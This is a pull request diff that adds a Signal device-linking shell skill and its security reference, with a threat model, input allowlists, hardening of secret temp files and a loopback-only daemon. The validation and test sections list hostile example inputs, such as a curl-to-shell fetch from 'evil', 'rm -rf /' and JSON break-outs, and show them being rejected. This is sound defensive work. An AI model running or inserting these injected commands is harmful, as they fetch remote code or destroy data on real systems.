### PR TITLE
feat(skills): add signal-setup skill for end-to-end Signal linking

### DIFF
--- a/amplifier-bundle/skills/signal-setup/README.md
+++ b/amplifier-bundle/skills/signal-setup/README.md
@@ -1,0 +1,49 @@
+# Signal Setup Skill
+
+Link a host — local machine or a remote **azlin** Azure VM — to **Signal** as a
+linked device, END-TO-END, and wire it into amplihack's Signal channel. The
+whole manual device-linking loop becomes one idempotent command.
+
+See [`SKILL.md`](./SKILL.md) for the full flow and the critical facts. The
+executable lives at [`scripts/signal-setup.sh`](./scripts/signal-setup.sh).
+
+## Quick start
+
+```bash
+# Link the local host
+scripts/signal-setup.sh --host "$(hostname -s)"
+
+# Link a remote azlin VM (auto-detected; links via `az vm run-command`)
+scripts/signal-setup.sh --host deva2
+
+# Skip the interactive prompt (scan screen already open)
+scripts/signal-setup.sh --host dev -y
+
+# Link only, skip the daemon + self-group + post-test phase
+scripts/signal-setup.sh --host dev --no-daemon
+```
+
+## What it does
+
+1. **Prereqs** — `signal-cli` (0.14.5, `~/.local/bin/signal-cli`), `qrencode`,
+   and `az` (remote hosts only).
+2. **Prompt** to open Signal → Linked Devices → Link New Device.
+3. **Mint** the link under `systemd-run` (local, or remote via
+   `az vm run-command` + `systemd-run --uid=azureuser`).
+4. **Render** the QR in-terminal with `qrencode -t ANSIUTF8i` (zero latency,
+   dark-terminal-safe).
+5. **Verify** linkage via `signal-cli listAccounts`.
+6. **Channel** (optional) — start the JSON-RPC daemon on `127.0.0.1:7583`,
+   ensure a self-only group, and post-test.
+
+## The three facts that make it work
+
+- **60-second window**: Signal's provisioning socket closes (code 1001) 60s
+  after the QR is minted. Be on the scan screen first; scan immediately.
+- **`ANSIUTF8i`** (inverted): required so the QR is visible/scannable on dark
+  terminals. Never deliver the QR through Signal itself.
+- **`systemd-run`**: keeps the link process alive the full window; remote runs
+  need `--uid=azureuser` because `az vm run-command` runs as root.
+
+Idempotent: re-running an already-linked host skips linking and just (re)ensures
+the daemon/group.

--- a/amplifier-bundle/skills/signal-setup/SECURITY.md
+++ b/amplifier-bundle/skills/signal-setup/SECURITY.md
@@ -40,8 +40,8 @@ injection** — not authentication or web auth.
 | T2 | Link-secret disclosure via predictable `/tmp` | Another local user reads or pre-creates `/tmp/slink-*` / `/tmp/scli-*` | **Medium** | Unguessable per-run path, `0600` via `systemd-run --property=UMask=0077`, unlink-after-render — §4 |
 | T3 | Root `rm -f` on an attacker-planted symlink | Cleanup deletes/overwrites a file a symlink points at | **Medium** | Unguessable per-run paths so the target name can't be pre-created — §4 |
 | T4 | JSON / argument injection into the daemon | `--phone` / `--group` / `groupId` embedded raw into a JSON-RPC request | **Medium** | `json_escape()` on every interpolated value — §5 |
-| T5 | Unauthenticated daemon reachable off-box | Daemon bound to `0.0.0.0` | **Low** | Bound to `127.0.0.1` only; never `0.0.0.0` — §6 |
-| T6 | PII / secret leakage via `ps`, argv, or verbose logs | Phone number in argv; `-vv` trace captures identity material | **Low** | `0600` logs, purge on success, documented argv caveat — §7 |
+| T5 | Unauthenticated daemon reachable off-box | Daemon bound to `0.0.0.0` | **Low** | Bound to `127.0.0.1` only; never `0.0.0.0` — §6. `SIGNAL_SETUP_DAEMON_TCP` is loopback-allowlist validated (fail-closed) |
+| T6 | PII / secret leakage via `ps`, argv, or verbose logs | Phone number in argv; `-vv` trace captures identity material; link secret on a render command line | **Low** | `0600` logs, purge on success, documented argv caveat, **link secret piped to `qrencode` via stdin (never argv)** — §7 |
 
 ---
 
@@ -170,10 +170,17 @@ operator-validated.
 - **Daemon binding.** The JSON-RPC daemon is started with
   `--tcp 127.0.0.1:7583` — **loopback only**. It is intentionally
   **unauthenticated**, so its only boundary is the network binding.
+- **Enforced, not just conventional.** The endpoint is configurable via
+  `SIGNAL_SETUP_DAEMON_TCP`, but the script validates it at startup and **fails
+  closed** on anything but a loopback host (`127.0.0.1`/`localhost`) plus a
+  numeric port. Routable hosts (`0.0.0.0`, LAN IPs) and IPv6/multi-colon forms
+  are rejected before any daemon is spawned, so this invariant is guaranteed by
+  code, not merely documented.
 
 **Invariant:** never bind the daemon to `0.0.0.0`, a routable interface, or a
 wildcard. An off-box, unauthenticated JSON-RPC daemon is a full account-control
-exposure.
+exposure. This is enforced by loopback-allowlist validation of
+`SIGNAL_SETUP_DAEMON_TCP` (fail-closed).
 
 ---
 
@@ -185,6 +192,13 @@ exposure.
   `/proc/<pid>/environ` to the same user only) if you prefer to keep it out of
   shell history, but understand it is not a strong secret boundary on a
   multi-user box.
+- The **`sgnl://` link secret is never placed on any command line.** It is
+  rendered by piping the URI to `qrencode` **via stdin** (`printf '%s' "$uri" |
+  qrencode ...`), not by passing it as an argv argument. Passing it as an
+  argument would expose the crown-jewel provisioning secret in `qrencode`'s
+  argv (readable by other local users via `ps` / `/proc/<pid>/cmdline`) for the
+  duration of the render — defeating the on-disk hardening of §4. Keeping the
+  secret off argv is a load-bearing invariant: never `qrencode ... "$uri"`.
 - The **`-vv` trace log** can capture identity material (`Associated with:
   +<phone>`, provisioning details). It is written `0600` (the `systemd-run`
   unit's `UMask=0077`, §4) under the per-run token and purged by the cleanup

--- a/amplifier-bundle/skills/signal-setup/SECURITY.md
+++ b/amplifier-bundle/skills/signal-setup/SECURITY.md
@@ -119,17 +119,18 @@ secrets and written under a hardened regime:
   Because the suffix cannot be predicted, another local user cannot
   **pre-create** the path as a symlink (defeating the classic `/tmp` symlink
   attack, T3) nor **poll** a known path to read the secret (T2).
-- **Trap-based cleanup.** A `trap cleanup_secrets EXIT INT TERM` guarantees both
-  files are removed on any exit path — normal completion, `Ctrl-C`, or
-  termination. For remote hosts, cleanup also removes the equivalent files on
-  the VM via `run-command`.
+- **Trap-based cleanup.** A `trap cleanup_secrets EXIT INT TERM` guarantees the
+  URI file, trace log, and local daemon log are removed on any exit path —
+  normal completion, `Ctrl-C`, or termination. For remote hosts, cleanup also
+  removes the equivalent link files on the VM via `run-command`.
 - **Unlink-after-render.** The URI copy is deleted **immediately after the QR is
   rendered**, not left on disk for the full ~60-second window. The secret lives
   on disk only for the few milliseconds between capture and QR emission.
 
-**Invariant:** do not reintroduce fixed paths such as `/tmp/slink-<host>.out` or
-`/tmp/scli-<host>.log`. Predictable names re-open T2/T3. Every secret-bearing
-path must carry the per-run token.
+**Invariant:** do not reintroduce fixed paths such as `/tmp/slink-<host>.out`,
+`/tmp/scli-<host>.log`, or `/tmp/signal-daemon-<host>.log`. Predictable names
+re-open T2/T3. Every secret- or message-bearing path must carry the per-run
+token.
 
 ---
 
@@ -225,7 +226,7 @@ bash "$S" --help ; echo "exit=$?"                                    # expect 0
 # Static confirmations:
 grep -n 'umask 077'          "$S"   # present, before any file the script writes
 grep -n 'RUN_TOKEN'          "$S"   # per-run unguessable suffix
-grep -n 'property=UMask=0077' "$S"   # 0600 for unit-written secrets (2 systemd-run calls + 1 comment)
+grep -n 'property=UMask=0077' "$S"   # 0600 for unit-written secrets (both systemd-run calls)
 grep -n 'trap cleanup_secrets' "$S" # EXIT INT TERM cleanup
 grep -n 'json_escape'        "$S"   # applied to phone/group/groupId
 grep -n '127.0.0.1:7583'     "$S"   # daemon loopback-only, never 0.0.0.0
@@ -234,9 +235,20 @@ grep -n '127.0.0.1:7583'     "$S"   # daemon loopback-only, never 0.0.0.0
 > **Note on verifying file mode:** `grep 'umask 077'` alone does **not** prove
 > the link secrets are `0600` — those files are written *inside* the
 > `systemd-run` unit, which ignores the caller's umask. The load-bearing check
-> is that **`--property=UMask=0077` appears on both `systemd-run` invocations**
-> (`grep -c` returns 3: the two calls plus the explanatory comment). If you have
-> a linked host available, you can also confirm at runtime with
+> is that **`--property=UMask=0077` appears on every *secret-writing* (`link -n`)
+> `systemd-run` invocation** (the daemon unit writes no `sgnl://` secret to disk).
+> Assert this by intent rather than a raw count (a bare `grep -c` also matches
+> explanatory comments and rots as the script evolves):
+>
+> ```bash
+> # Every unit that writes a link secret (`link -n … > $URI_FILE`) must carry
+> # the UMask hardening. Assert by intent, not a hard-coded total:
+> link_units=$(grep -c 'link -n' "$S")             # the two mint invocations
+> hardened=$(grep -c 'property=UMask=0077' "$S")   # hardening directives present
+> [ "$hardened" -ge "$link_units" ] && echo "OK: every link/mint unit is hardened"
+> ```
+>
+> If you have a linked host available, you can also confirm at runtime with
 > `stat -c '%a' /tmp/slink-*-<token>.out` during the ~60s window (expect `600`).
 
 ---

--- a/amplifier-bundle/skills/signal-setup/SECURITY.md
+++ b/amplifier-bundle/skills/signal-setup/SECURITY.md
@@ -37,7 +37,7 @@ injection** — not authentication or web auth.
 | # | Threat | Vector | Severity | Mitigation (this script) |
 |---|--------|--------|----------|--------------------------|
 | T1 | Command / argument injection | Malicious `--host`, `--resource-group`, `--group`, `--phone` flowing into shell command lines, the root-executed `az run-command` payload, or JSON-RPC strings | **High** | Strict allowlist validation (fail closed) — §3 |
-| T2 | Link-secret disclosure via predictable `/tmp` | Another local user reads or pre-creates `/tmp/slink-*` / `/tmp/scli-*` | **Medium** | `umask 077`, unguessable per-run path, `0600`, unlink-after-render — §4 |
+| T2 | Link-secret disclosure via predictable `/tmp` | Another local user reads or pre-creates `/tmp/slink-*` / `/tmp/scli-*` | **Medium** | Unguessable per-run path, `0600` via `systemd-run --property=UMask=0077`, unlink-after-render — §4 |
 | T3 | Root `rm -f` on an attacker-planted symlink | Cleanup deletes/overwrites a file a symlink points at | **Medium** | Unguessable per-run paths so the target name can't be pre-created — §4 |
 | T4 | JSON / argument injection into the daemon | `--phone` / `--group` / `groupId` embedded raw into a JSON-RPC request | **Medium** | `json_escape()` on every interpolated value — §5 |
 | T5 | Unauthenticated daemon reachable off-box | Daemon bound to `0.0.0.0` | **Low** | Bound to `127.0.0.1` only; never `0.0.0.0` — §6 |
@@ -93,9 +93,19 @@ into a script executed as **root** on the remote VM.
 The minted `sgnl://` URI and the `signal-cli -vv` trace log are treated as
 secrets and written under a hardened regime:
 
-- **`umask 077`** is set before any file is created, so every file the script
-  writes is owner-only (`rw-------`) from birth — no world/group-readable
-  window.
+- **Owner-only from birth (`0600`).** Two layers guarantee mode `rw-------`:
+  - **`umask 077`** is set before any file the *script process itself* writes
+    (e.g. the daemon log), so those are owner-only from birth.
+  - **The link secrets are written inside a `systemd-run` transient unit.** The
+    `URI_FILE` and `LOG_FILE` are created by a shell redirect *inside* the
+    transient unit, **not** by the script process — and a `systemd-run` unit
+    does **not** inherit the caller's `umask` (systemd defaults to
+    `UMask=0022`, which would yield world-readable `0644`). We therefore pin the
+    unit's umask explicitly with **`--property=UMask=0077`** on **both** the
+    local and remote `systemd-run` invocations, so the secret files are `0600`
+    from creation. This is the mechanism that actually protects the secrets;
+    the process-level `umask 077` alone cannot reach files written inside the
+    unit.
 - **Unguessable, per-run paths.** File names embed a per-invocation
   `RUN_TOKEN` composed of the epoch seconds, the PID, and two `$RANDOM`
   draws:
@@ -109,8 +119,6 @@ secrets and written under a hardened regime:
   Because the suffix cannot be predicted, another local user cannot
   **pre-create** the path as a symlink (defeating the classic `/tmp` symlink
   attack, T3) nor **poll** a known path to read the secret (T2).
-- **`0600` mode** — combined with `umask 077`, contents are never exposed to
-  other local accounts.
 - **Trap-based cleanup.** A `trap cleanup_secrets EXIT INT TERM` guarantees both
   files are removed on any exit path — normal completion, `Ctrl-C`, or
   termination. For remote hosts, cleanup also removes the equivalent files on
@@ -177,8 +185,9 @@ exposure.
   shell history, but understand it is not a strong secret boundary on a
   multi-user box.
 - The **`-vv` trace log** can capture identity material (`Associated with:
-  +<phone>`, provisioning details). It is written `0600` under the per-run
-  token and purged by the cleanup trap on success, so it does not persist.
+  +<phone>`, provisioning details). It is written `0600` (the `systemd-run`
+  unit's `UMask=0077`, §4) under the per-run token and purged by the cleanup
+  trap on success, so it does not persist.
 
 ---
 
@@ -214,12 +223,21 @@ bash "$S" --host local --phone '15551234567' -y   ; echo "exit=$?"   # expect no
 bash "$S" --help ; echo "exit=$?"                                    # expect 0
 
 # Static confirmations:
-grep -n 'umask 077'          "$S"   # present, before any file write
+grep -n 'umask 077'          "$S"   # present, before any file the script writes
 grep -n 'RUN_TOKEN'          "$S"   # per-run unguessable suffix
+grep -n 'property=UMask=0077' "$S"   # 0600 for unit-written secrets (2 systemd-run calls + 1 comment)
 grep -n 'trap cleanup_secrets' "$S" # EXIT INT TERM cleanup
 grep -n 'json_escape'        "$S"   # applied to phone/group/groupId
 grep -n '127.0.0.1:7583'     "$S"   # daemon loopback-only, never 0.0.0.0
 ```
+
+> **Note on verifying file mode:** `grep 'umask 077'` alone does **not** prove
+> the link secrets are `0600` — those files are written *inside* the
+> `systemd-run` unit, which ignores the caller's umask. The load-bearing check
+> is that **`--property=UMask=0077` appears on both `systemd-run` invocations**
+> (`grep -c` returns 3: the two calls plus the explanatory comment). If you have
+> a linked host available, you can also confirm at runtime with
+> `stat -c '%a' /tmp/slink-*-<token>.out` during the ~60s window (expect `600`).
 
 ---
 
@@ -227,8 +245,9 @@ grep -n '127.0.0.1:7583'     "$S"   # daemon loopback-only, never 0.0.0.0
 
 1. Validate `--host` / `--resource-group` / `--group` / `--phone` against the
    allowlists **before** any use; fail closed.
-2. Every secret-bearing temp path carries the per-run `RUN_TOKEN`; `umask 077`,
-   `0600`, trap cleanup, and unlink-the-URI-after-render.
+2. Every secret-bearing temp path carries the per-run `RUN_TOKEN`; the link
+   secrets are `0600` via `systemd-run --property=UMask=0077` (the unit ignores
+   the caller's `umask`), with trap cleanup and unlink-the-URI-after-render.
 3. `json_escape()` every value interpolated into a JSON-RPC body.
 4. Daemon binds `127.0.0.1` only — never `0.0.0.0`.
 5. Remote payloads drop root to `--uid/--gid=azureuser`.

--- a/amplifier-bundle/skills/signal-setup/SECURITY.md
+++ b/amplifier-bundle/skills/signal-setup/SECURITY.md
@@ -41,7 +41,7 @@ injection** — not authentication or web auth.
 | T3 | Root `rm -f` on an attacker-planted symlink | Cleanup deletes/overwrites a file a symlink points at | **Medium** | Unguessable per-run paths so the target name can't be pre-created — §4 |
 | T4 | JSON / argument injection into the daemon | `--phone` / `--group` / `groupId` embedded raw into a JSON-RPC request | **Medium** | `json_escape()` on every interpolated value — §5 |
 | T5 | Unauthenticated daemon reachable off-box | Daemon bound to `0.0.0.0` | **Low** | Bound to `127.0.0.1` only; never `0.0.0.0` — §6. `SIGNAL_SETUP_DAEMON_TCP` is loopback-allowlist validated (fail-closed) |
-| T6 | PII / secret leakage via `ps`, argv, or verbose logs | Phone number in argv; `-vv` trace captures identity material; link secret on a render command line | **Low** | `0600` logs, purge on success, documented argv caveat, **link secret piped to `qrencode` via stdin (never argv)** — §7 |
+| T6 | PII / secret leakage via `ps`, argv, or verbose logs | Phone number in argv; `-vv` trace captures identity material; link secret on a render command line | **Low** | `0600` logs, link secret always purged, trace purged on success (retained `0600` on failure for debugging), documented argv caveat, **link secret piped to `qrencode` via stdin (never argv)** — §7 |
 
 ---
 
@@ -120,9 +120,14 @@ secrets and written under a hardened regime:
   **pre-create** the path as a symlink (defeating the classic `/tmp` symlink
   attack, T3) nor **poll** a known path to read the secret (T2).
 - **Trap-based cleanup.** A `trap cleanup_secrets EXIT INT TERM` guarantees the
-  URI file, trace log, and local daemon log are removed on any exit path —
-  normal completion, `Ctrl-C`, or termination. For remote hosts, cleanup also
-  removes the equivalent link files on the VM via `run-command`.
+  URI file is removed on any exit path — normal completion, `Ctrl-C`, or
+  termination. The `sgnl://` link secret (`URI_FILE`) is **always** purged. The
+  `-vv` trace log and the local daemon log — which hold identity material but
+  **not** the link secret — are purged on **success** and deliberately
+  **retained (still `0600`) on failure**, with their paths printed, so a
+  hard-to-reproduce link failure inside the ~60s window stays debuggable. For
+  remote hosts, cleanup also removes the URI (always) and the trace (on success)
+  on the VM via `run-command`.
 - **Unlink-after-render.** The URI copy is deleted **immediately after the QR is
   rendered**, not left on disk for the full ~60-second window. The secret lives
   on disk only for the few milliseconds between capture and QR emission.
@@ -202,7 +207,9 @@ exposure. This is enforced by loopback-allowlist validation of
 - The **`-vv` trace log** can capture identity material (`Associated with:
   +<phone>`, provisioning details). It is written `0600` (the `systemd-run`
   unit's `UMask=0077`, §4) under the per-run token and purged by the cleanup
-  trap on success, so it does not persist.
+  trap **on success**. On **failure** it is deliberately retained (still `0600`)
+  and its path is printed, so a link failure remains diagnosable; it never
+  contains the `sgnl://` link secret (that is `URI_FILE`, always purged).
 
 ---
 

--- a/amplifier-bundle/skills/signal-setup/SECURITY.md
+++ b/amplifier-bundle/skills/signal-setup/SECURITY.md
@@ -1,0 +1,235 @@
+# signal-setup — Security Hardening Reference
+
+Security documentation for the `signal-setup` skill
+(`scripts/signal-setup.sh`). It describes the hardening that is **built into**
+the script, the threat model it defends against, the trust anchors it relies
+on, and the operational invariants an operator must uphold.
+
+Read this together with the **Security model** section of
+[`SKILL.md`](./SKILL.md). This file is the detailed, authoritative reference;
+`SKILL.md` carries the short summary.
+
+---
+
+## 1. Why this script needs a hardened posture
+
+Unlike a typical web feature, `signal-setup` has **no login/session surface**.
+Its risk comes from three properties of what it actually does:
+
+1. **It mints Signal device-link secrets.** The `sgnl://` provisioning URI it
+   captures is a short-lived credential: anyone who reads it within the
+   ~60-second window can link *their* device to the account.
+2. **It runs payloads on remote Azure VMs as root.** Remote minting goes through
+   `az vm run-command invoke ... RunShellScript`, which executes the supplied
+   script **as root** on the target VM. Operator-supplied values (`--host`,
+   `--resource-group`, temp-file paths) are interpolated into that payload.
+3. **It speaks to a local unauthenticated daemon.** The JSON-RPC daemon on
+   `127.0.0.1:7583` performs no authentication; any local process that can reach
+   the socket can drive it.
+
+The threat surface is therefore **secret handling, privilege use, and
+injection** — not authentication or web auth.
+
+---
+
+## 2. Threat model
+
+| # | Threat | Vector | Severity | Mitigation (this script) |
+|---|--------|--------|----------|--------------------------|
+| T1 | Command / argument injection | Malicious `--host`, `--resource-group`, `--group`, `--phone` flowing into shell command lines, the root-executed `az run-command` payload, or JSON-RPC strings | **High** | Strict allowlist validation (fail closed) — §3 |
+| T2 | Link-secret disclosure via predictable `/tmp` | Another local user reads or pre-creates `/tmp/slink-*` / `/tmp/scli-*` | **Medium** | `umask 077`, unguessable per-run path, `0600`, unlink-after-render — §4 |
+| T3 | Root `rm -f` on an attacker-planted symlink | Cleanup deletes/overwrites a file a symlink points at | **Medium** | Unguessable per-run paths so the target name can't be pre-created — §4 |
+| T4 | JSON / argument injection into the daemon | `--phone` / `--group` / `groupId` embedded raw into a JSON-RPC request | **Medium** | `json_escape()` on every interpolated value — §5 |
+| T5 | Unauthenticated daemon reachable off-box | Daemon bound to `0.0.0.0` | **Low** | Bound to `127.0.0.1` only; never `0.0.0.0` — §6 |
+| T6 | PII / secret leakage via `ps`, argv, or verbose logs | Phone number in argv; `-vv` trace captures identity material | **Low** | `0600` logs, purge on success, documented argv caveat — §7 |
+
+---
+
+## 3. Input validation (mitigates T1)
+
+All operator-controlled string inputs are validated **immediately after
+argument parsing and before any use**, via a `validate <label> <value> <regex>`
+helper that calls `die` (non-zero exit) on any violation. Validation is
+**fail-closed**: an empty or non-matching value aborts the run before a single
+downstream command, `az` payload, or JSON-RPC request is built.
+
+| Input | Allowlist regex | Rationale |
+|-------|-----------------|-----------|
+| `--host` | `^[A-Za-z0-9._-]+$` | DNS-label + Azure VM-name charset. No spaces, `;`, `$`, `` ` ``, quotes, or slashes — this value is interpolated into the root-executed remote payload and into `systemd` unit names. |
+| `--resource-group` | `^[A-Za-z0-9._()-]+$` | Azure resource-group naming charset (allows `()`). Flows into `az vm run-command -g`. |
+| `--group` | `^[A-Za-z0-9._ -]+$` | Self-group display name. Printable, spaces allowed, but no shell/JSON metacharacters. |
+| `--phone` | `^\+[1-9][0-9]{7,14}$` | Strict E.164. Validated only when provided. Flows into `signal-cli -a`, daemon args, and JSON-RPC. |
+
+Examples that are **rejected** (fail closed, non-zero exit, no side effects):
+
+```text
+--host 'x;reboot'                 → invalid characters
+--host '$(curl evil|sh)'          → invalid characters
+--resource-group 'rg; rm -rf /'   → invalid characters
+--group 'a","evil":"'             → invalid characters (JSON break-out)
+--phone '+1 555 000; id'          → not E.164
+--phone '15551234567'             → missing leading '+'
+```
+
+Examples that are **accepted**:
+
+```text
+--host local          --host deva          --host ia3.internal
+--resource-group rysweet-linux-vm-pool
+--resource-group my_rg(prod)
+--group amplihack     --group "amplihack fleet"
+--phone +15551234567
+```
+
+**Invariant:** never widen these regexes to admit whitespace-splitting,
+shell metacharacters (`; | & $ \` ( ) < > * ? { } [ ]`), quotes, or
+newlines. The `--host` and `--resource-group` values in particular are placed
+into a script executed as **root** on the remote VM.
+
+---
+
+## 4. Secret temp-file handling (mitigates T2, T3)
+
+The minted `sgnl://` URI and the `signal-cli -vv` trace log are treated as
+secrets and written under a hardened regime:
+
+- **`umask 077`** is set before any file is created, so every file the script
+  writes is owner-only (`rw-------`) from birth — no world/group-readable
+  window.
+- **Unguessable, per-run paths.** File names embed a per-invocation
+  `RUN_TOKEN` composed of the epoch seconds, the PID, and two `$RANDOM`
+  draws:
+
+  ```text
+  RUN_TOKEN = "<epoch>-<pid>-<RANDOM><RANDOM>"
+  URI_FILE  = /tmp/slink-<host>-<RUN_TOKEN>.out
+  LOG_FILE  = /tmp/scli-<host>-<RUN_TOKEN>.log
+  ```
+
+  Because the suffix cannot be predicted, another local user cannot
+  **pre-create** the path as a symlink (defeating the classic `/tmp` symlink
+  attack, T3) nor **poll** a known path to read the secret (T2).
+- **`0600` mode** — combined with `umask 077`, contents are never exposed to
+  other local accounts.
+- **Trap-based cleanup.** A `trap cleanup_secrets EXIT INT TERM` guarantees both
+  files are removed on any exit path — normal completion, `Ctrl-C`, or
+  termination. For remote hosts, cleanup also removes the equivalent files on
+  the VM via `run-command`.
+- **Unlink-after-render.** The URI copy is deleted **immediately after the QR is
+  rendered**, not left on disk for the full ~60-second window. The secret lives
+  on disk only for the few milliseconds between capture and QR emission.
+
+**Invariant:** do not reintroduce fixed paths such as `/tmp/slink-<host>.out` or
+`/tmp/scli-<host>.log`. Predictable names re-open T2/T3. Every secret-bearing
+path must carry the per-run token.
+
+---
+
+## 5. JSON-RPC escaping (mitigates T4)
+
+Every operator- or daemon-derived value embedded into a JSON-RPC request string
+is passed through `json_escape()` first. `json_escape` escapes backslash
+(first), double-quote, newline, carriage-return, and tab:
+
+```text
+raw:     amplihack","evil":"
+escaped: amplihack\",\"evil\":\"
+```
+
+This is applied to the account (`--phone`), the group name (`--group`), and the
+server-returned `groupId` before they are interpolated into `updateGroup` and
+`send` request bodies built by `rpc()`. Escaping runs **in addition to** the
+input-validation allowlist (§3): validation blocks the metacharacters at the
+door, `json_escape` is defense-in-depth for any value that legitimately
+contains a quotable character and for daemon-returned strings that are not
+operator-validated.
+
+**Invariant:** any new value interpolated into a JSON-RPC body must go through
+`json_escape()`. Never `printf` a raw variable into a JSON string.
+
+---
+
+## 6. Trust anchors & daemon exposure (mitigates T5)
+
+- **Remote trust anchor.** For remote hosts the operator's **`az` login
+  identity** plus **passwordless `sudo`/root** on the VM (via `run-command`) are
+  the trust anchor. There is no additional secret; possession of the `az`
+  session is authority to link. The linked account is deliberately dropped from
+  root to the unprivileged account with `--uid=azureuser --gid=azureuser` and
+  `--setenv=HOME=/home/azureuser`, so credentials land in the `azureuser` home,
+  not root's.
+- **Daemon binding.** The JSON-RPC daemon is started with
+  `--tcp 127.0.0.1:7583` — **loopback only**. It is intentionally
+  **unauthenticated**, so its only boundary is the network binding.
+
+**Invariant:** never bind the daemon to `0.0.0.0`, a routable interface, or a
+wildcard. An off-box, unauthenticated JSON-RPC daemon is a full account-control
+exposure.
+
+---
+
+## 7. PII & log hygiene (mitigates T6)
+
+- The **phone number** is present in `argv` and the process environment. On a
+  shared host, `argv` is visible to other local users via `ps`. This is an
+  accepted, documented limitation — use `SIGNAL_PHONE` env (still visible via
+  `/proc/<pid>/environ` to the same user only) if you prefer to keep it out of
+  shell history, but understand it is not a strong secret boundary on a
+  multi-user box.
+- The **`-vv` trace log** can capture identity material (`Associated with:
+  +<phone>`, provisioning details). It is written `0600` under the per-run
+  token and purged by the cleanup trap on success, so it does not persist.
+
+---
+
+## 8. Operational security invariants (azlin / remote)
+
+These interact with security correctness, not just reliability:
+
+- **Never pipe `azlin`/`az` output into an early-closing consumer.** `azlin` is
+  a Rust binary that **aborts (SIGABRT / core-dump) on SIGPIPE**. A core dump
+  can persist secret-bearing memory to disk. The script **captures full output
+  first**, then filters (`remote_run` reads the whole message before any
+  `sed`/`grep`). Do not "optimize" this into `azlin ... | grep -q`.
+- **One bastion/azlin session per VM.** Concurrent sessions to the same VM
+  core-dump. Do not run this skill against the same host from two places at
+  once — besides breaking the run, a crash mid-link can leave a partial secret
+  on the VM before the cleanup trap fires.
+
+---
+
+## 9. Verifying the hardening
+
+Quick, non-destructive checks an operator/reviewer can run:
+
+```bash
+S=amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh
+
+# Injection attempts must fail closed (non-zero, no side effects):
+bash "$S" --host 'x;reboot' --phone +15551234567 ; echo "exit=$?"   # expect non-zero
+bash "$S" --host local --group 'a","evil":"' -y   ; echo "exit=$?"   # expect non-zero
+bash "$S" --host local --phone '15551234567' -y   ; echo "exit=$?"   # expect non-zero (no '+')
+
+# Valid input parses past validation:
+bash "$S" --help ; echo "exit=$?"                                    # expect 0
+
+# Static confirmations:
+grep -n 'umask 077'          "$S"   # present, before any file write
+grep -n 'RUN_TOKEN'          "$S"   # per-run unguessable suffix
+grep -n 'trap cleanup_secrets' "$S" # EXIT INT TERM cleanup
+grep -n 'json_escape'        "$S"   # applied to phone/group/groupId
+grep -n '127.0.0.1:7583'     "$S"   # daemon loopback-only, never 0.0.0.0
+```
+
+---
+
+## 10. Summary of security invariants (do not regress)
+
+1. Validate `--host` / `--resource-group` / `--group` / `--phone` against the
+   allowlists **before** any use; fail closed.
+2. Every secret-bearing temp path carries the per-run `RUN_TOKEN`; `umask 077`,
+   `0600`, trap cleanup, and unlink-the-URI-after-render.
+3. `json_escape()` every value interpolated into a JSON-RPC body.
+4. Daemon binds `127.0.0.1` only — never `0.0.0.0`.
+5. Remote payloads drop root to `--uid/--gid=azureuser`.
+6. Never pipe `azlin`/`az` into an early-closing reader; one session per VM.

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -173,6 +173,34 @@ assume you have already completed.
   azlin connect <host> --resource-group rysweet-linux-vm-pool --no-tmux -y -- "<cmd>"
   ```
 
+## Security model
+
+The script mints Signal device-link secrets and (for remote hosts) runs
+payloads on Azure VMs, so its threat surface is **secret handling, privilege
+use, and injection** — not web auth. Hardening built into the script:
+
+- **Input validation (fail closed).** `--host`, `--resource-group`, `--group`,
+  and `--phone` are validated against strict allowlists right after arg parsing.
+  These values flow into shell command lines, `az vm run-command` payloads
+  (executed as root remotely), and JSON-RPC strings, so malformed input like
+  `--host 'x;reboot'` is rejected before use.
+- **JSON-RPC escaping.** `--phone`/`--group`/`groupId` are `json_escape`d before
+  being embedded in daemon requests, preventing JSON/argument injection.
+- **Secret temp files.** The minted `sgnl://` URI (a ~60s provisioning secret)
+  and the `-vv` trace log are written with `umask 077` to **unguessable,
+  per-run** paths at `0600`, cleaned up via an `EXIT`/`INT`/`TERM` trap, and the
+  URI copy is **deleted immediately after the QR renders** rather than left for
+  the whole window. This defeats predictable-`/tmp` symlink and disclosure
+  attacks by other local users.
+- **Trust anchors.** For remote hosts the operator's **`az` login identity** and
+  **passwordless `sudo`** are the trust anchor; the linked account is dropped to
+  `--uid/--gid=azureuser`. The local JSON-RPC daemon is **unauthenticated but
+  bound to `127.0.0.1` only** — never expose it on `0.0.0.0`.
+- **PII.** The phone number lives only in argv/env; note argv is visible via
+  `ps` to other local users.
+
+---
+
 ## Prerequisites (install if missing)
 
 - **signal-cli 0.14.5** (known-good) at `~/.local/bin/signal-cli`

--- a/amplifier-bundle/skills/signal-setup/SKILL.md
+++ b/amplifier-bundle/skills/signal-setup/SKILL.md
@@ -1,0 +1,189 @@
+---
+name: signal-setup
+version: 1.0.0
+description: |
+  End-to-end, idempotent Signal device-linking for amplihack on a local or
+  remote (azlin VM) host. Runs the full loop in one invocation: prerequisite
+  check, prompt to open the phone's scan screen, mint a fresh device-link under
+  systemd-run, render the QR DIRECTLY in the terminal (zero delivery latency,
+  ANSIUTF8i inverted for dark terminals), verify linkage, and optionally start
+  the JSON-RPC daemon, ensure the amplihack self-group, and post a test message.
+  Use when onboarding a host to the amplihack Signal channel, when a prior link
+  attempt showed "invalid response from server", or when you need to re-link /
+  verify a fleet host's Signal account.
+auto_activates:
+  - "Set up Signal for a host"
+  - "Link Signal device"
+  - "Signal device linking"
+  - "Link a fleet host to Signal"
+  - "amplihack signal setup"
+  - "Signal QR invalid response from server"
+priority_score: 36.0
+---
+
+# Signal Setup Skill
+
+Link a host (local or remote azlin VM) to Signal for the amplihack Signal
+channel — reliably, in one command, without falling into the 60-second trap
+that caused hours of failures.
+
+## When to invoke
+
+- Onboarding a new local or fleet host to the amplihack Signal channel.
+- A device-link attempt failed with **"invalid response from server"** on the
+  phone (almost always the expired-QR / 60s-window failure — see below).
+- You need to verify or re-establish a host's Signal linkage and confirm the
+  JSON-RPC daemon + self-group post-test works.
+
+## How to invoke
+
+```bash
+# Local host, interactive (prompts you to confirm the scan screen is open):
+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh \
+  --host local --phone +15551234567
+
+# Remote azlin VM (mint runs on the VM via az run-command; QR renders LOCALLY):
+amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh \
+  --host deva --phone +15551234567 --resource-group rysweet-linux-vm-pool
+
+# Skip the daemon/self-group/post-test step:
